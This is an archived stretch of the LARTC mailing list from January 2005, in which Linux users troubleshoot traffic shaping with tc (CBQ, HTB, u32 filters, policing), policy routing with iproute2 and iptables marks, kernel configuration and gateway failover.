  borrowed 0 overactions 363 avgidle -195655 undertime -8.22928e+08

From tgraf@suug.ch Thu Jan 6 16:45:53 2005
From: tgraf@suug.ch (Thomas Graf)
Date: Thu, 6 Jan 2005 17:45:53 +0100
Subject: [LARTC] [PATCH] mark in u32
In-Reply-To: <41DD3CBC.1010108@dsl.pipex.com>
References: <41DC00E0.2070300@dsl.pipex.com> <20050105151026.GR26856@postel.suug.ch> <41DC06D8.70301@dsl.pipex.com> <20050105155250.GA17836@postel.suug.ch> <41DC1880.6090405@dsl.pipex.com> <41DCFE27.4030704@dsl.pipex.com> <20050106095009.GU26856@postel.suug.ch> <41DD3CBC.1010108@dsl.pipex.com>
Message-ID: <20050106164553.GV26856@postel.suug.ch>

* Andy Furniss <41DD3CBC.1010108@dsl.pipex.com> 2005-01-06 13:27
> Thomas Graf wrote:
> >* Andy Furniss <41DCFE27.4030704@dsl.pipex.com> 2005-01-06 09:00
> >
> >>I retried with a vanilla 2.6.10 + iptables 1.2.11 on a different box and
> >>it is the same.
> >
> >
> >2 options:
> > 1) get latest -bk snapshot and apply
> > http://people.suug.ch/~tgr/patches/pending/
> > The patchset fixes a lot of small issues, adds action capabilities to
> > all classifiers, and extends tcindex and route classifier to be
> > changeable
> > during runtime. If problem remains, go to 2.
>
> Could take some time - I don't have bitkeeper and will have to find some
> disk space. I'll try soon(ish).

You don't need bitkeeper, just download the .10 and the latest patch to get to -bk8 then apply my patches.

> tc filter add dev eth0 parent ffff: protocol ip prio 1 u32 match ip src
> 0.0.0.0/0 police rate 100kbit burst 10k drop flowid :1
>
> Works OK.
>
> tc filter add dev eth0 parent ffff: protocol 6 prio 1 u32 match ip src
> 0.0.0.0/0 police rate 100kbit burst 10k drop flowid :1

Use a different prio, one that is not yet occupied by a protocol/kind tuple.

> [andy@amd ~]$ grep NET_CLS /boot/config-2.6.10
> CONFIG_NET_CLS=y
> CONFIG_NET_CLS_TCINDEX=m
> CONFIG_NET_CLS_ROUTE4=m
> CONFIG_NET_CLS_ROUTE=y
> CONFIG_NET_CLS_FW=m
> CONFIG_NET_CLS_U32=m
> # CONFIG_NET_CLS_IND is not set
> CONFIG_NET_CLS_RSVP=m
> CONFIG_NET_CLS_RSVP6=m
> CONFIG_NET_CLS_ACT=y

CONFIG_NET_CLS_ACT_POLICE?

> [andy@amd ~]$ grep NET_CLS /boot/config-2.6.10-2
> CONFIG_NET_CLS=y
> CONFIG_NET_CLS_TCINDEX=m
> CONFIG_NET_CLS_ROUTE4=m
> CONFIG_NET_CLS_ROUTE=y
> CONFIG_NET_CLS_FW=m
> CONFIG_NET_CLS_U32=m
> # CONFIG_NET_CLS_IND is not set
> CONFIG_NET_CLS_RSVP=m
> CONFIG_NET_CLS_RSVP6=m
> # CONFIG_NET_CLS_ACT is not set
> CONFIG_NET_CLS_POLICE=y
>
> [andy@amd ~]$ grep NET_CLS /boot/config-2.6.10-3
> CONFIG_NET_CLS=y
> CONFIG_NET_CLS_TCINDEX=m
> CONFIG_NET_CLS_ROUTE4=m
> CONFIG_NET_CLS_ROUTE=y
> CONFIG_NET_CLS_FW=m
> CONFIG_NET_CLS_U32=m
> # CONFIG_NET_CLS_IND is not set
> CONFIG_NET_CLS_RSVP=m
> CONFIG_NET_CLS_RSVP6=m

Gonna look at this, do you preload the modules and if not, do you have the correct modutils version etc?
> CONFIG_NET_CLS_ACT=y
> CONFIG_NET_CLS_POLICE=y

This is not valid and has been fixed in bk.

From payal-lartc@scriptkitchen.com Thu Jan 6 16:55:32 2005
From: payal-lartc@scriptkitchen.com (Payal Rathod)
Date: Thu, 6 Jan 2005 11:55:32 -0500
Subject: [LARTC] routing decisions
Message-ID: <20050106165532.GA12737@tranquility.scriptkitchen.com>

Hi,
I have Mandrake 10.0 gateway with internet via. ppp0. Also, another machine 192.168.0.4 is always connected to net via. a dial-up modem. Now I want to allow a machine (192.168.0.2) in my LAN to access net through 192.168.0.4. So according to lartc howto I did,

# echo 200 John >> /etc/iproute2/rt_tables
# ip rule add from 192.168.0.2 table John
# ip route add default via 192.168.0.4 dev eth0 table John
# ip route flush cache

But still 192.168.0.2 cannot access internet. tracert shows that the traffic is coming to my Linux gateway and then going nowhere. I have not changed anything in 192.168.0.2

What steps am I missing?

Waiting eagerly for any help on this.
With warm regards,
-Payal

From imipak@yahoo.com Thu Jan 6 17:30:48 2005
From: imipak@yahoo.com (Jonathan Day)
Date: Thu, 6 Jan 2005 09:30:48 -0800 (PST)
Subject: [LARTC] routing decisions
In-Reply-To: <20050106165532.GA12737@tranquility.scriptkitchen.com>
Message-ID: <20050106173048.31999.qmail@web12302.mail.yahoo.com>

Is packet forwarding enabled on the box you're using as a gateway?

--- Payal Rathod wrote:
> Hi,
> I have Mandrake 10.0 gateway with internet via.
> ppp0. Also, another
> machine 192.168.0.4 is always connected to net via.
> a dial-up
> modem. Now I want to allow a machine (192.168.0.2)
> in my LAN to
> access net through 192.168.0.4. So according to
> lartc howto I did,
> # echo 200 John >> /etc/iproute2/rt_tables
> # ip rule add from 192.168.0.2 table John
> # ip route add default via 192.168.0.4 dev eth0
> table John
> # ip route flush cache
>
> But still 192.168.0.2 cannot access internet.
> tracert shows that
> the traffic is coming to my Linux gateway and then
> going nowhere.
> I have not changed anything in 192.168.0.2
>
> What steps am I missing?
>
> Waiting eagerly for any help on this.
> With warm regards,
> -Payal

From payal-lartc@scriptkitchen.com Thu Jan 6 17:40:59 2005
From: payal-lartc@scriptkitchen.com (Payal Rathod)
Date: Thu, 6 Jan 2005 12:40:59 -0500
Subject: [LARTC] routing decisions
In-Reply-To: <20050106173048.31999.qmail@web12302.mail.yahoo.com>
References: <20050106165532.GA12737@tranquility.scriptkitchen.com> <20050106173048.31999.qmail@web12302.mail.yahoo.com>
Message-ID: <20050106174059.GA13890@tranquility.scriptkitchen.com>

On Thu, Jan 06, 2005 at 09:30:48AM -0800, Jonathan Day wrote:
> Is packet forwarding enabled on the box you're using
> as a gateway?

Of course, because if I delete the default route using route command and add 192.168.0.4 as default route I can reach the internet.

-Payal

From stef.coene@docum.org Thu Jan 6 19:28:16 2005
From: stef.coene@docum.org (Stef Coene)
Date: Thu, 6 Jan 2005 20:28:16 +0100
Subject: [LARTC] tc and ntop inconsistent data flow
In-Reply-To: <50784.212.175.247.7.1105025581.squirrel@webmail2.kibris.net>
References: <50784.212.175.247.7.1105025581.squirrel@webmail2.kibris.net>
Message-ID: <200501062028.16256.stef.coene@docum.org>

On Thursday 06 January 2005 16:33, Mehmet Ali Suzen wrote:
> Dear List,
> Sorry for the duplicated email but I couldn't get any answer.
>
> I am trying to limit some IP blocks with tc with following three step.
>
> # interface
> tc qdisc add dev eth0 root handle 1: cbq avpkt 1000 bandwidth 256kbit #
> class tc class add dev eth0 parent 1: classid 1:1 cbq rate 64kbit \
> allot 1500 prio 5 bounded isolated
> # rules
> # download
> tc filter add dev eth0 parent 1: protocol ip prio 16 u32 \
> match ip dst 10.0.1.0/24 flowid 1:1
> # upload
> tc filter add dev eth0 parent 1: protocol ip prio 16 u32 \
> match ip src 10.0.1.0/24 flowid 1:1
>
>
> Problem is when I try to measure traffic with ntop (www.ntop.org), it is
> seen that overall traffic which that ip block limited to is
> much higher than 64kbit, actually it is about 500Kbps which
> signifies that tc do not limit properly. What could be the reason
> of this inconsistency? How could I limit 64 Kbps? Is the above
> configuration correct?

Remove the isolated parameter and try it again. I have some working cbq scripts on http://docum.org on the test pages.

Stef

From MKrauss@hitchhiker.com Thu Jan 6 20:11:43 2005
From: MKrauss@hitchhiker.com (Matthias Krauss)
Date: Thu, 6 Jan 2005 21:11:43 +0100
Subject: [LARTC] iproute with iptables/mangle
Message-ID:

Hi List,

i have a really strange problem with no solution yet, i'm using iproute together with the iptables mangle option, in a dmz network is a cisco pix present with another inet link behind, therefore i'm using the mangle option to split traffic on a protocol base like:

iptables -A PREROUTING -t mangle -i eth1 -s 192.168.1.5 -p tcp --dport 80 -j MARK --set-mark 3

and add the rule with:

ip rule add fwmark 3 table 10

and add the default route to the pix:

ip route add default via 192.168.2.254 dev eth2 table 10

This is working fine so far, now comes the problem, i got another network with a lancom dsl router where another inet link is behind, im using the same mangle and iproute options like

iptables -A PREROUTING -t mangle -i eth1 -s 192.168.1.6 -p tcp --dport 80 -j MARK --set-mark 4

and add the rule with:

ip rule add fwmark 4 table 20

and add the default route to the dsl
router:

ip route add default via 192.168.3.254 dev eth3 table 20

This doesn't work anymore, a tcpdump shows:

tcpdump src host 192.168.1.6 or dst host 192.168.1.6 -e -i eth3
tcpdump: listening on eth3
18:19:15.444110 0:2:1e:f8:83:0 0:a0:57:f:df:7b ip 62: 192.168.1.6.1184 > 66.102.9.104.www: S 1459260866:1459260866(0) win 65535 (DF)
18:19:15.514463 0:a0:57:f:df:7b 0:2:1e:f8:83:0 ip 60: 66.102.9.104.www > 192.168.1.6.1184: S 2669725313:2669725313(0) ack 1459260867 win 8190
18:19:18.459396 0:2:1e:f8:83:0 0:a0:57:f:df:7b ip 62: 192.168.1.6.1184 > 66.102.9.104.www: S 1459260866:1459260866(0) win 65535

Turning the mangle option off and modify the rule to

iproute rule add from 192.168.1.6 table 20

works well, tcpdump shows then:

tcpdump src host 10.0.1.62 or dst host 10.0.1.62 -e -i eth3
tcpdump: listening on eth3
18:36:05.914468 0:2:1e:f8:83:0 0:a0:57:f:df:7b ip 62: 192.168.1.6.1191 > 66.102.9.104.www: S 2339385470:2339385470(0) win 65535 (DF)
18:36:05.985144 0:a0:57:f:df:7b 0:2:1e:f8:83:0 ip 60: 66.102.9.104.www > 192.168.1.6: S 558741672:558741672(0) ack 2339385471 win 8190
18:36:05.985440 0:2:1e:f8:83:0 0:a0:57:f:df:7b ip 54: 192.168.1.6.1191 > 66.102.9.104.www: . ack 1 win 65535 (DF)
18:36:05.985617 0:2:1e:f8:83:0 0:a0:57:f:df:7b ip 358: 192.168.1.6.1191 > 66.102.9.104.www: P 1:305(304) ack 1 win 65535 (DF)
18:36:06.075635 0:a0:57:f:df:7b 0:2:1e:f8:83:0 ip 1454: 66.102.9.104.www > 192.168.1.6.1191: . 1:1401(1400) ack 305 win 7504 [tos 0x10]
18:36:06.076339 0:a0:57:f:df:7b 0:2:1e:f8:83:0 ip 320: 66.102.9.104.www > 192.168.1.6.1191: P 1401:1667(266) ack 305 win 7504 [tos 0x10]
18:36:06.076653 0:2:1e:f8:83:0 0:a0:57:f:df:7b ip 54: 192.168.1.6.1191 >

Does anybody have an idea what this could be ?

thx
Matt

From jlaraujo@mercs.homeip.net Thu Jan 6 22:16:42 2005
From: jlaraujo@mercs.homeip.net (Jose Luis Araujo)
Date: Thu, 06 Jan 2005 22:16:42 +0000
Subject: [LARTC] failover strategies - failing open vs. failing closed.
In-Reply-To: <292B2D5F863ED611BB8B0008021089550315970E@aux.uwm.edu>
References: <292B2D5F863ED611BB8B0008021089550315970E@aux.uwm.edu>
Message-ID: <41DDB8CA.2050000@mercs.homeip.net>

Hi.

Sorry for the delay. Hope you are still interested in the idea.

Kelly Jeglum wrote:

>I'd like to setup a box with 2 NICs as a firewall which will also rate
>limits outbound traffic. What happens when/if that box hangs or is
>rebooted?
>
>
If you are doing NAT or routing, then you need to use VRRPD with two machines.

>I'd like a solution that when there is a failure, traffic can still go
>through the box even though the firewall and rate limiting functions will no
>longer be in effect.
>
>
If on the other hand you want just the rate limiting, then you can try something. It only has a drawback, the switch that you will use must have Vlan and STP.

The trick is this, you choose three ports, and assign those to, say vlan 2, then choose another 3 ports and assign those to vlan 3.
Enable STP on both Vlan's, increase the portcost on one port on each Vlan, and use a crossed cable to link them.
Connect a port from each Vlan to the bridge/rate limiter.
Connect the remaining port to your inner router, and to your outer router.

Now, the idea is, the Vlan will divide the switch virtually, traffic from vlan 2 won't go to vlan 3, only if they are physically connected, they behave like two switches (which will also work, provided that the switches permit VTP). When everything is working properly, the switch will see two links from vlan 2 to vlan 3 and will disable the one with the higher cost (the cross cable), then all your traffic will flow through the bridge.

If the bridge stops, hangs, or is disconnected, the switch will only see one link (the cross cable) and will enable it, bypassing the bridge.

I have this setup in operation now, and it works great.

For those wondering, it is using a cisco 2900XL and the fallback time is from 30 to 50 seconds.
Hope it helps

José Araújo

From andy.furniss@dsl.pipex.com Thu Jan 6 23:23:04 2005
From: andy.furniss@dsl.pipex.com (Andy Furniss)
Date: Thu, 06 Jan 2005 23:23:04 +0000
Subject: [LARTC] [PATCH] mark in u32
In-Reply-To: <20050106164553.GV26856@postel.suug.ch>
References: <41DC00E0.2070300@dsl.pipex.com> <20050105151026.GR26856@postel.suug.ch> <41DC06D8.70301@dsl.pipex.com> <20050105155250.GA17836@postel.suug.ch> <41DC1880.6090405@dsl.pipex.com> <41DCFE27.4030704@dsl.pipex.com> <20050106095009.GU26856@postel.suug.ch> <41DD3CBC.1010108@dsl.pipex.com> <20050106164553.GV26856@postel.suug.ch>
Message-ID: <41DDC858.6010908@dsl.pipex.com>

Thomas Graf wrote:
> You don't need bitkeeper, just download the .10 and the latest patch to
> get to -bk8 then apply my patches.
>
>
>>tc filter add dev eth0 parent ffff: protocol ip prio 1 u32 match ip src
>>0.0.0.0/0 police rate 100kbit burst 10k drop flowid :1
>>
>>Works OK.
>>
>>tc filter add dev eth0 parent ffff: protocol 6 prio 1 u32 match ip src
>>0.0.0.0/0 police rate 100kbit burst 10k drop flowid :1
>
>
> Use a different prio, one that is not yet occupied by a protocol/kind
> tuple.

OK will try.

>
> CONFIG_NET_CLS_ACT_POLICE?

I can't find it! neither can grep .config

This could be it. I just deleted everything to do with 2.6.10, booted into 2.6.9 to start again with fresh 2.6.10 source tree. When I do make menuconfig I notice it uses defaults from /boot/config-2.6.9 (I will remove and try again later). So maybe this is why I can't find CONFIG_NET_CLS_ACT_POLICE ?

>>[andy@amd ~]$ grep NET_CLS /boot/config-2.6.10-3
>>CONFIG_NET_CLS=y
>>CONFIG_NET_CLS_TCINDEX=m
>>CONFIG_NET_CLS_ROUTE4=m
>>CONFIG_NET_CLS_ROUTE=y
>>CONFIG_NET_CLS_FW=m
>>CONFIG_NET_CLS_U32=m
>># CONFIG_NET_CLS_IND is not set
>>CONFIG_NET_CLS_RSVP=m
>>CONFIG_NET_CLS_RSVP6=m
>
>
> Gonna look at this, do you preload the modules and if not, do you have
> the correct modutils version etc?
Sorry - don't waste your time - I goofed my bzImage / GRUB naming so I was loading the first one I did all along.

Andy.

From tgraf@suug.ch Thu Jan 6 23:25:13 2005
From: tgraf@suug.ch (Thomas Graf)
Date: Fri, 7 Jan 2005 00:25:13 +0100
Subject: [LARTC] [PATCH] mark in u32
In-Reply-To: <41DDC858.6010908@dsl.pipex.com>
References: <41DC00E0.2070300@dsl.pipex.com> <20050105151026.GR26856@postel.suug.ch> <41DC06D8.70301@dsl.pipex.com> <20050105155250.GA17836@postel.suug.ch> <41DC1880.6090405@dsl.pipex.com> <41DCFE27.4030704@dsl.pipex.com> <20050106095009.GU26856@postel.suug.ch> <41DD3CBC.1010108@dsl.pipex.com> <20050106164553.GV26856@postel.suug.ch> <41DDC858.6010908@dsl.pipex.com>
Message-ID: <20050106232513.GX26856@postel.suug.ch>

* Andy Furniss <41DDC858.6010908@dsl.pipex.com> 2005-01-06 23:23
> >CONFIG_NET_CLS_ACT_POLICE?
>
> I can't find it! neither can grep .config

Sorry, it's called CONFIG_NET_ACT_POLICE

From andy.furniss@dsl.pipex.com Thu Jan 6 23:35:37 2005
From: andy.furniss@dsl.pipex.com (Andy Furniss)
Date: Thu, 06 Jan 2005 23:35:37 +0000
Subject: [LARTC] [PATCH] mark in u32
In-Reply-To: <20050106232513.GX26856@postel.suug.ch>
References: <41DC00E0.2070300@dsl.pipex.com> <20050105151026.GR26856@postel.suug.ch> <41DC06D8.70301@dsl.pipex.com> <20050105155250.GA17836@postel.suug.ch> <41DC1880.6090405@dsl.pipex.com> <41DCFE27.4030704@dsl.pipex.com> <20050106095009.GU26856@postel.suug.ch> <41DD3CBC.1010108@dsl.pipex.com> <20050106164553.GV26856@postel.suug.ch> <41DDC858.6010908@dsl.pipex.com> <20050106232513.GX26856@postel.suug.ch>
Message-ID: <41DDCB49.6020105@dsl.pipex.com>

Thomas Graf wrote:
> * Andy Furniss <41DDC858.6010908@dsl.pipex.com> 2005-01-06 23:23
>
>>>CONFIG_NET_CLS_ACT_POLICE?
>>
>>I can't find it! neither can grep .config
>
>
> Sorry, it's called CONFIG_NET_ACT_POLICE
>

OK - will be booting back into LFS to try soon.

Andy.
From Tanasescu Mihai Thu Jan 6 23:52:15 2005
From: Tanasescu Mihai (Tanasescu Mihai)
Date: Fri, 7 Jan 2005 01:52:15 +0200
Subject: [LARTC] Wierd traceroute/routing problem
Message-ID:

Hello,

I'm having a very strange problem concerning traceroute and routing and didn't know if lartc or netfilter would be the correct choice for asking. (so sorry if my question is misplaced)

I have the following setup:

public ip -- gw1 -- 172.16.0.1 --- 172.16.0.2/and public ip's --- gw2 --- switch --users (public and private ip addresses; ip-user-pub)

from the internet:

Traceroute to an ip-user-pub shows:

public ip gw1 --> 172.16.0.2 --> ip-user-pub

I tried using SNAT on gw2 so that instead of 172.16.0.2 I would get one of the public ip addresses I have on gw2.

It seems that packets with ttl time exceeded in transit get through to the mangle table in POSTROUTING but no longer reach the nat table in POSTROUTING (so they no longer get SNATed).

The same thing happens to these kind of icmp packets if I try to SNAT them on gw1.

Tcpdump just shows me 172.16.0.2 each time, exiting the public interfaces and the nat rule counter does not increase..

I also tried marking packets in mangle table and then seeing if that same mark reaches the nat table (both done in POSTROUTING) and saw that my mark no longer gets to the nat table.

Any idea what's causing this ? Or how can I make it so that instead of 172.16.0.2 I would get one of gw2's public ip's ?
From andy.furniss@dsl.pipex.com Fri Jan 7 02:45:28 2005
From: andy.furniss@dsl.pipex.com (Andy Furniss)
Date: Fri, 07 Jan 2005 02:45:28 +0000
Subject: [LARTC] [PATCH] mark in u32
In-Reply-To: <41DDCB49.6020105@dsl.pipex.com>
References: <41DC00E0.2070300@dsl.pipex.com> <20050105151026.GR26856@postel.suug.ch> <41DC06D8.70301@dsl.pipex.com> <20050105155250.GA17836@postel.suug.ch> <41DC1880.6090405@dsl.pipex.com> <41DCFE27.4030704@dsl.pipex.com> <20050106095009.GU26856@postel.suug.ch> <41DD3CBC.1010108@dsl.pipex.com> <20050106164553.GV26856@postel.suug.ch> <41DDC858.6010908@dsl.pipex.com> <20050106232513.GX26856@postel.suug.ch> <41DDCB49.6020105@dsl.pipex.com>
Message-ID: <41DDF7C8.4000109@dsl.pipex.com>

Andy Furniss wrote:
> Thomas Graf wrote:
>
>> * Andy Furniss <41DDC858.6010908@dsl.pipex.com> 2005-01-06 23:23
>>
>>>> CONFIG_NET_CLS_ACT_POLICE?
>>>
>>>
>>> I can't find it! neither can grep .config
>>
>>
>>
>> Sorry, it's called CONFIG_NET_ACT_POLICE
>>
>
> OK - will be booting back into LFS to try soon.

Still no luck - I got build errors with bk8 (same type as below in fbdev IIRC) so tried bk9 and got error below. I've seen that before with 2.95.3 (though it was mandrakes not LFS - had to move some vars up to top to get Ed Wildgooses dsl patch to compile IIRC) so I tried bk8 with gcc 3.3 and it built OK, but still no luck + my usb intelli mouse didn't work.

I tried the prio change on a 2.4 but it makes no difference.

I have CONFIG_NET_ACT_POLICE in all my configs and police auto loads OK on 2.6.9 (haven't checked others yet)- the 2.6.10-bk8 didn't autoload it though, but modprobe first didn't help.

Probably lots more to try/check but it's getting late :-)

Does my initial test case work OK for you guys ?
http://marc.theaimsgroup.com/?l=lartc&m=110122532022827&w=2 The build error - CC net/sched/sch_generic.o CC net/sched/sch_api.o CC net/sched/sch_fifo.o CC net/sched/cls_api.o net/sched/cls_api.c: In function `tcf_exts_validate': net/sched/cls_api.c:467: parse error before `int' net/sched/cls_api.c:471: `act' undeclared (first use in this function) net/sched/cls_api.c:471: (Each undeclared identifier is reported only once net/sched/cls_api.c:471: for each function it appears in.) net/sched/cls_api.c:472: `err' undeclared (first use in this function) make[2]: *** [net/sched/cls_api.o] Error 1 make[1]: *** [net/sched] Error 2 make: *** [net] Error 2 Andy. From Zhenyu Wu" Hello, I think I have misundertood the relationship between cbq and the queue (such as Red) attached to it. This is my latest opion, please give me some advice on it: At beginning, I thought that a packet will be firstly classified by the CBQ where it will find the proper class it belongs to. Then the packet enters the queue attached to that class. At last, the packet is scheduled in that queue, and put into the link. But now, I find it is wrong. I have read the source code on CBQ again, especially the part-cbq_dequeue, I think that at first the CBQ will find the active class and their priority. Then in the function cbq_dequeue_prio, the algorithm WRR will be used to schedule the packet. At first, it find a class, then, this skb = cl->q->dequeue(cl->q) maybe very important, I think "cl->q" is the queue attached to the class "cl". So, the packet in the different queue is scheduled and put into the link. Another issue is that a scheduling algorithm WRR is used here, But i think it is not the best one, So can we modify here and add a new scheduling algorithm as we expected? What about your opions? 
Best,

From andy.furniss@dsl.pipex.com Fri Jan 7 10:29:24 2005
From: andy.furniss@dsl.pipex.com (Andy Furniss)
Date: Fri, 07 Jan 2005 10:29:24 +0000
Subject: [LARTC] [PATCH] mark in u32
In-Reply-To: <41DDF7C8.4000109@dsl.pipex.com>
References: <41DC00E0.2070300@dsl.pipex.com> <20050105151026.GR26856@postel.suug.ch> <41DC06D8.70301@dsl.pipex.com> <20050105155250.GA17836@postel.suug.ch> <41DC1880.6090405@dsl.pipex.com> <41DCFE27.4030704@dsl.pipex.com> <20050106095009.GU26856@postel.suug.ch> <41DD3CBC.1010108@dsl.pipex.com> <20050106164553.GV26856@postel.suug.ch> <41DDC858.6010908@dsl.pipex.com> <20050106232513.GX26856@postel.suug.ch> <41DDCB49.6020105@dsl.pipex.com> <41DDF7C8.4000109@dsl.pipex.com>
Message-ID: <41DE6484.9050100@dsl.pipex.com>

Andy Furniss wrote:
> my usb intelli mouse didn't
> work.

> the 2.6.10-bk8 didn't autoload it
> though,

Of course putting -bk8 on my /boot/System.map-2.6.10 will fix that ...

Will try more tonight.

Andy.

From prakash@comodo.com Fri Jan 7 10:15:43 2005
From: prakash@comodo.com (Annamalai Prakash)
Date: Fri, 7 Jan 2005 15:45:43 +0530
Subject: [LARTC] arm Linux 2.4.19-rmk7-ds3 with Traffic shaping and Routing.
Message-ID: <200501071545.49002.prakash@comodo.com>

Hi,

I am very newbie to this group. I am working on ixdp425 embedded Board. I have brought up board with linux 2.4.19-rmk7-ds3 kernel with Qos support. Now I want to do traffic control (tc) on my board. Is there any patches available for this kernel and also application. I don't know which version of iproute2 is compatible one with this. I'm planning to use iproute2-1.2.7a. Please guide me ... I'm trying to implement this from last week...

--
Thanks & Regards
K.Annamalai Prakash

From andre.correa@pobox.cla Fri Jan 7 13:29:53 2005
From: andre.correa@pobox.cla (Andre Correa)
Date: Fri, 07 Jan 2005 11:29:53 -0200
Subject: [LARTC] Filter question
In-Reply-To: <41DD5120.9030209@pobox.com>
References: <200410121632.38611.alg0@iit.demokritos.gr> <41DD5120.9030209@pobox.com>
Message-ID: <41DE8ED1.2090409@pobox.com>

Hi guys, I may not have made myself clear in my last message so I'll try it easy this time. Maybe someone can send me some help.

I'm trying something like this:

# root stuff
tc qdisc add dev eth0 root handle 1: htb default 2
tc class add dev eth0 parent 1: classid 1:1 htb rate 50000kbit
# default class
tc class add dev eth0 parent 1: classid 1:2 htb rate 2000kbit

# root class for my "garanteed bandwidth" service
tc class add dev eth0 parent 1: classid 1:3 htb rate 10Mbit

# class for a 1Mbit shared bandwidth
tc class add dev eth0 parent 1:3 classid 1:1024 htb rate 1Mbit
# qdisc used to _make my life easier scripting classes numbers_
tc qdisc add dev eth0 parent 1:1024 handle 1024: htb default 250
# default class for this second qdisc
tc class add dev eth0 parent 1024: classid 1024:250 htb rate 32kbit

# each customer gets the following class and filter
tc class add dev eth0 parent 1024: classid 1024:1 htb rate 256kbit
tc filter add dev eth0 parent 1: protocol ip prio 1 u32 match ip dst xxx.xxx.xxx.xxx/yy flowid 1024:1

# another customer...
tc class add dev eth0 parent 1024: classid 1024:2 htb rate 256kbit
tc filter add dev eth0 parent 1: protocol ip prio 1 u32 match ip dst www.www.www.www/zzz flowid 1024:2

My problem is that these filters are created but they don't send traffic to the expected class. All traffic is going to 1:2 (default class). Can somebody tell me why?
I appreciate any help, I'm in trouble with this...

tks in advance.

Andre

From junk@maild.mine.nu Fri Jan 7 14:40:45 2005
From: junk@maild.mine.nu (junk@maild.mine.nu)
Date: Fri, 7 Jan 2005 16:40:45 +0200 (IST)
Subject: [LARTC] How to balance OUTBOUND traffic by packet if..
Message-ID: <1383.192.168.1.2.1105108845@maild.mine.nu>

how to use iproute/iptables to balance by packet OUTBOUND traffic between 2 PPP (pptp cable modem and pppoe adsl modem) links to the same ISP. also by using the fact that the ISP doesn't filter source IP address - meaning i can use either PPP's link assigned IP address as the source IP in the ip header.., it works for both devices.., what i want to achieve is: when uploading a large file, i could use both devices to shoot data but bound only to one source IP.

Naturally i could expect all data to go back through the device with that corresponding IP, at least that is what happens according to ethereal

From msuzen@kibris.net Fri Jan 7 16:29:27 2005
From: msuzen@kibris.net (Mehmet Ali Suzen)
Date: Fri, 7 Jan 2005 18:29:27 +0200 (EET)
Subject: [LARTC] tc and ntop inconsistent data flow
In-Reply-To: <200501062028.16256.stef.coene@docum.org>
References: <50784.212.175.247.7.1105025581.squirrel@webmail2.kibris.net> <200501062028.16256.stef.coene@docum.org>
Message-ID: <42020.212.175.247.7.1105115367.squirrel@webmail2.kibris.net>

Dear Stef Coene,
Many thanks for the tip. Seems like it is working now. But I have restrict 2 way traffic with 42 Kbit, that is correspond to 64 Kbit. Is it logical? What is the proportion between download and upload in an ideal data flow?

Best Regards,
Mehmet.

PS: Thanx for your effort in your web site. sharing info you have with the community.

> On Thursday 06 January 2005 16:33, Mehmet Ali Suzen wrote:
>> Dear List,
>> Sorry for the duplicated email but I couldn't get any answer.
>>
>> I am trying to limit some IP blocs with tc with following three step.
>>
>> # interface
>> tc qdisc add dev eth0 root handle 1: cbq avpkt 1000 bandwidth 256kbit
>> # class
>> tc class add dev eth0 parent 1: classid 1:1 cbq rate 64kbit \
>> allot 1500 prio 5 bounded isolated
>> # rules
>> # download
>> tc filter add dev eth0 parent 1: protocol ip prio 16 u32 \
>> match ip dst 10.0.1.0/24 flowid 1:1
>> # upload
>> tc filter add dev eth0 parent 1: protocol ip prio 16 u32 \
>> match ip src 10.0.1.0/24 flowid 1:1
>>
>>
>> Problem is when I try to measure traffic with ntop (www.ntop.org), it is
>> seen that overall traffic which that ip block limited to is
>> much higher then 64kbit, actually it is about 500Kbps which
>> signifies that tc do not limit properly. What could be the reason
>> of this inconsistency? How could I limit 64 Kbps? Is the above
>> configuration correct?
> Remove the isolated parameter and try it again.
> I have some working cbq scripts on http://docum.org on the test pages.
>
> Stef
> _______________________________________________
> LARTC mailing list / LARTC@mailman.ds9a.nl
> http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/
>

From andy.furniss@dsl.pipex.com Fri Jan 7 19:50:31 2005
From: andy.furniss@dsl.pipex.com (Andy Furniss)
Date: Fri, 07 Jan 2005 19:50:31 +0000
Subject: [LARTC] Filter question
In-Reply-To: <41DE8ED1.2090409@pobox.com>
References: <200410121632.38611.alg0@iit.demokritos.gr> <41DD5120.9030209@pobox.com> <41DE8ED1.2090409@pobox.com>
Message-ID: <41DEE807.8060702@dsl.pipex.com>

Andre Correa wrote:
>
> Hi guys, I may not have made myself clear in my last message so I'll try
> it easy this time. Maybe someone can send me some help.
>
> I'm trying something like this:
>
>
> # root stuff
> tc qdisc add dev eth0 root handle 1: htb default 2
> tc class add dev eth0 parent 1: classid 1:1 htb rate 50000kbit
> # default class
> tc class add dev eth0 parent 1: classid 1:2 htb rate 2000kbit
>
> # root class for my "garanteed bandwidth" service
> tc class add dev eth0 parent 1: classid 1:3 htb rate 10Mbit
>
> # class for a 1Mbit shared bandwidth
> tc class add dev eth0 parent 1:3 classid 1:1024 htb rate 1Mbit
> # qdisc used to _make my life easier scripting classes numbers_
> tc qdisc add dev eth0 parent 1:1024 handle 1024: htb default 250
> # default class for this second qdisc
> tc class add dev eth0 parent 1024: classid 1024:250 htb rate 32kbit
>
> # each customer gets the following class and filter
> tc class add dev eth0 parent 1024: classid 1024:1 htb rate 256kbit
> tc filter add dev eth0 parent 1: protocol ip prio 1 u32 match ip dst
> xxx.xxx.xxx.xxx/yy flowid 1024:1
>
> # another customer...
> tc class add dev eth0 parent 1024: classid 1024:2 htb rate 256kbit
> tc filter add dev eth0 parent 1: protocol ip prio 1 u32 match ip dst
> www.www.www.www/zzz flowid 1024:2
>
>
> My problem is that these filters are created but they don't send traffic
> to the expected class. All traffic is going to 1:2 (default class). Can
> somebody tell me why?
>
> I appreciate any help, I'm in trouble with this...
>
> tks in advance.
>
> Andre
> _______________________________________________
> LARTC mailing list / LARTC@mailman.ds9a.nl
> http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/
>

From andy.furniss@dsl.pipex.com Fri Jan 7 19:59:13 2005
From: andy.furniss@dsl.pipex.com (Andy Furniss)
Date: Fri, 07 Jan 2005 19:59:13 +0000
Subject: [LARTC] Filter question
In-Reply-To: <41DE8ED1.2090409@pobox.com>
References: <200410121632.38611.alg0@iit.demokritos.gr> <41DD5120.9030209@pobox.com> <41DE8ED1.2090409@pobox.com>
Message-ID: <41DEEA11.2070802@dsl.pipex.com>

Andre Correa wrote:
>
> Hi guys, I may not have made myself clear in my last message so I'll try
> it easy this time. Maybe someone can send me some help.
>
> I'm trying something like this:
>
>
> # root stuff
> tc qdisc add dev eth0 root handle 1: htb default 2
> tc class add dev eth0 parent 1: classid 1:1 htb rate 50000kbit
> # default class
> tc class add dev eth0 parent 1: classid 1:2 htb rate 2000kbit
>
